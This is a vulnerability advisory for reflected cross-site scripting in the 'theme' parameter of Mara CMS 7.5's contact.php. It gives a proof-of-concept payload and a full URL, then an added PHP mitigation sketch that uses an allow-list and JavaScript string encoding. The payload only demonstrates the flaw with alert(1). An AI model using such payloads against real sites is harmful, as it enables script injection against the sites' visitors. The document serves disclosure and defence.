Mara CMS version 7.5 suffers from a cross-site scripting vulnerability in the theme parameter of contact.php.
==============================================================================
| # Title : Mara CMS 7.5 Cross Site Scripting |
| # Author : George Tsimpidas |
| # Tested on : Kali Linux (X64) |
| # Vendor : https://sourceforge.net/projects/maracms/ |
==============================================================================
PoC
[+] Use Payload : seven69387';alert(1)//154
Path : http://localhost/contact.php?theme=<inject payload here>
Full PoC :
http://localhost/contact.php?theme=seven69387';alert(1)//154
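
Mitigation sketch (an added example, not code from this advisory or from Mara CMS): the payload's shape, a closing single quote followed by a statement and `//`, is the pattern for leaving a single-quoted JavaScript string, so the example assumes `theme` is written into such a string. The theme names and the functions `resolve_theme()` and `js_string()` are hypothetical; it needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Hypothetical theme names; the real list would come from the installed themes.
const ALLOWED_THEMES = ['default', 'dark', 'print'];
const FALLBACK_THEME = 'default';

/**
 * Return a theme name that is safe to use, or the fallback.
 * Only exact matches against the allow-list pass; everything else,
 * including the advisory's payload, is discarded rather than "cleaned".
 */
function resolve_theme(mixed $raw): string
{
    if (!is_string($raw)) {          // ?theme[]=x arrives as an array
        return FALLBACK_THEME;
    }
    return in_array($raw, ALLOWED_THEMES, true) ? $raw : FALLBACK_THEME;
}

/**
 * Encode a value as a JavaScript string literal for use inside a <script> block.
 * json_encode() emits its own double quotes; the JSON_HEX_* flags turn
 * ', ", <, > and & into \uXXXX escapes so the value cannot close the
 * string or the enclosing <script> element.
 */
function js_string(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed inputs: a valid name, the payload from the PoC, and an array.
$samples = ['dark', "seven69387';alert(1)//154", ['x']];

foreach ($samples as $raw) {
    $theme = resolve_theme($raw);
    // Defence in depth: even an allow-listed value is encoded at the sink.
    echo 'var theme = ' . js_string($theme) . ";\n";
}

// What the encoder alone does with the payload, without the allow-list:
echo js_string("seven69387';alert(1)//154"), "\n";
```

If the value is instead echoed into HTML text or an attribute, the matching encoder is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')`; the allow-list check stays the same.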